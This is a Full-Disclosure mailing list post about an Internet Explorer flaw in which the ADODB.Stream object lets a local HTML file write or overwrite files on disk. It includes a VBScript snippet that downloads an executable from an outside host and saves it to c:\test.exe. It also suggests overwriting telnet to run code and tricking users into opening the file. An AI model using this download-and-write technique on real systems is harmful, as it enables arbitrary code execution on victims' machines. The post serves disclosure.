A few days microsoft patched an Internet Explorer Object Data Remote
Execution Vulnerability found by EEYE, shortly after,
HTTP-EQUIV posted some sample code on his website shortly followed by finjan
(pimping their product) on bugtraq
Both where kind of messy so I decided to write my own and thought I might be
able to use the ADODB.Stream object to create the file on disk. unfortunatly
for some weird reason this didn't quite succeed and i settled on
http://ip3e83566f.speed.planet.nl/eeye.html , it is rather slow but does the
trick and changing the payload is done in a matter of seconds.
But anyway while playing with the ADODB.Stream object I did find that it
allows writing / overwriting of files from within a simple html file when
run from a location on your harddisk (and consequentially allowing execution
of arbitrary code by for instance overwriting telnet and then all a
telnet:// style URL)
this kind of behaviour is generally only allowed from within trusted
containers, such as HTA's
Also it doen't set off norton antivirus's script protection
here's the a code snipet that illustrates this, its been tested on IE6 on
winXP :
<script language="vbscript">
const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE";,
false
xmlHTTP.send
contents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite
</script>
I dont think it in it self can not be concidered a security vulnerabilty as
it only works when the file containing the code is present on a users
harddisk, though html files are generally considered trusted and you can
probably trick some people into opening an html file by sending it to them
through msn messenger or whatever.
It can most likely be used to leverage other vulnerabilities, for instance
many programs download information to predictable locations from where you
might invoke it.
Now invoking it from the local disk has been somewhat of a problem since IE6
sp1 as it basicly disallows access to file:/// style URL's from the
internet. however there are some (rather messy) workarounds, HTTP-EQUIV
posted a way of circumventing this a while back using media player 8
also i found out a long time ago that calling local files from window shares
is still very much allowed and you can link to html files placed on windows
shares from the internet though this is rather cumbersome to set up, other
hopefully easier ways will probably pop up.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
